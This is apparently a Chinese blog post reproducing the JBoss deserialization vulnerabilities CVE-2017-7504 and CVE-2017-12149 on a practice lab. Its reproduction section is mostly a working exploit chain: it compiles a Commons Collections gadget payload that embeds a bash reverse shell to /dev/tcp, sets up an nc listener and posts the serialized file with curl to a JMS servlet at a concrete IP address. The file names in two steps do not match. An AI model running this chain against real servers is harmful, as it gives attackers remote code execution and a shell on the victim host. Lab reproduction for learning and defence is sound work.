jboss反序列化漏洞复现

前言

最近参加某保险的安全攻防演练,发现攻击队利用JBOSS反序列化漏洞,成功getshell。趁着热乎劲,赶紧复现一下。

漏洞描述

CVE-2017-7504

JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

CVE-2017-12149

漏洞影响5.x和6.x版本的JBOSSAS。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。

靶场地址:http://vulfocus.fofa.so/#/dashboard

工具下载地址:https://github.com/joaomatosf/JavaDeserH2HC

复现过程

在VPS上分别执行以下命令:

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/VPS/port 0>&1"
第一行命令执行完成后,将生成一个文件ExampleCommonsCollections1WithHashMap.class
第二行命令执行完成后,将生成一个文件ExampleCommonsCollections1WithHashMap.ser

 

使用nc监听一个端口

nc -lvp port

将该文件作为body发送如下数据包:

curl http://118.193.36.37:63089/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ExampleCommonsCollections1.ser

 成功反弹Shell。

 参考链接:https://www.cnblogs.com/iamver/p/11282928.html

 

 

 

 

 

 

 

posted @ 2020-07-10 21:23  弟中第  阅读(248)  评论(0)    收藏  举报